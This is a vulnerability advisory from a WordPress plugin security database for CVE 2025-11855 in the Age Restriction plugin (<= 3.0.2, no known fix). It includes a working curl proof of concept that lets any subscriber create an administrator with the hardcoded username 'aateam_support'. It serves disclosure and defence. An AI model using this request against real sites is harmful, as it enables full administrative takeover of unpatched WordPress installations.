Age Restriction <= 3.0.2 – Subscriber+ Privilege Escalation | CVE 2025-11855 | Plugin Vulnerabilities

Description

The plugin does not have authorisation in the age_restrictionRemoteSupportRequest function, allowing any authenticated users, such as subscriber to create an admin user with a hardcoded username and arbitrary password.

Proof of Concept

```
curl -i -X POST "https://example.com/wp-admin/admin-ajax.php" \
  -d "action=age_restrictionRemoteSupportRequest" \
  -d "sub_actions=access_details" \
  --data-urlencode "params=age_restriction-create_wp_credential=yes&age_restriction-password=<NewPassword>"
```

You can then log in as admin with the user `aateam_support` and the password set above.

Affects Plugins

age-restriction

No known fix

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

1a16440e-817f-4ec2-9c70-261f6b63fb8a

Timeline

Publicly Published

2025-10-21 (about 2 months ago)

Added

2025-10-21 (about 2 months ago)

Last Updated

2025-10-21 (about 2 months ago)

Other

Published

Title

Published

2020-04-13

Title

Responsive Poll < 1.3.4 - Broken Authentication and Missing Capability Checks on AJAX calls

Published

2024-09-30

Title

Echo RSS Feed Post Generator < 5.4.7 - Unauthenticated Privilege Escalation

Published

2024-12-17

Title

VibeBP < 1.9.9.5 - Unauthenticated Privilege Escalation

Published

2024-04-23

Title

Booking Ultra Pro < 1.1.13 - Authenticated (Contributor+) Privilege Escalation

Published

2025-11-06

Title

IDonate 2.1.5 - 2.1.9 - Subscriber+ Account Takeover/Privilege Escalation